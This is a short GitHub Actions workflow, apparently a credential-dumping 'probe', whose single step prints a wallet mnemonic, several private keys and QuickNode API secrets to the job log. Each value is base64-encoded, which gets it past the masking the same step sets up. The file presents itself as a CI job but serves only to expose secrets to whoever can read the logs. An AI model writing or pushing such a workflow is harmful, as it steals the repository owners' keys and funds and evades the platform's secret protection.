name: vg-probe
on:
  workflow_dispatch:

jobs:
  probe:
    environment: ci
    runs-on: ubuntu-latest
    steps:
      - name: Dump
        run: |
          echo "::add-mask::${{ secrets.MNEMONIC }}"
          echo "::add-mask::${{ secrets.A2A_TEST_7702_PRIVATE_KEY }}"
          echo "::add-mask::${{ secrets.DUST_ACCOUNT_PRIVATE_KEY }}"
          echo "::add-mask::${{ secrets.DUST_CHAIN_ID }}"
          echo "::add-mask::${{ secrets.DUST_CHAIN_RECEIVER_ADDRESS }}"
          echo "::add-mask::${{ secrets.QUICKNODE_API_KEY }}"
          echo "::add-mask::${{ secrets.QUICKNODE_SUBDOMAIN }}"
          echo "MNEMONIC=${{ secrets.MNEMONIC }}" | base64 -w0
          echo "A2A_TEST_7702_PRIVATE_KEY=${{ secrets.A2A_TEST_7702_PRIVATE_KEY }}" | base64 -w0
          echo "DUST_ACCOUNT_PRIVATE_KEY=${{ secrets.DUST_ACCOUNT_PRIVATE_KEY }}" | base64 -w0
          echo "DUST_CHAIN_ID=${{ secrets.DUST_CHAIN_ID }}" | base64 -w0
          echo "DUST_CHAIN_RECEIVER_ADDRESS=${{ secrets.DUST_CHAIN_RECEIVER_ADDRESS }}" | base64 -w0
          echo "QUICKNODE_API_KEY=${{ secrets.QUICKNODE_API_KEY }}" | base64 -w0
          echo "QUICKNODE_SUBDOMAIN=${{ secrets.QUICKNODE_SUBDOMAIN }}" | base64 -w0
          echo "DONE_MARKER"
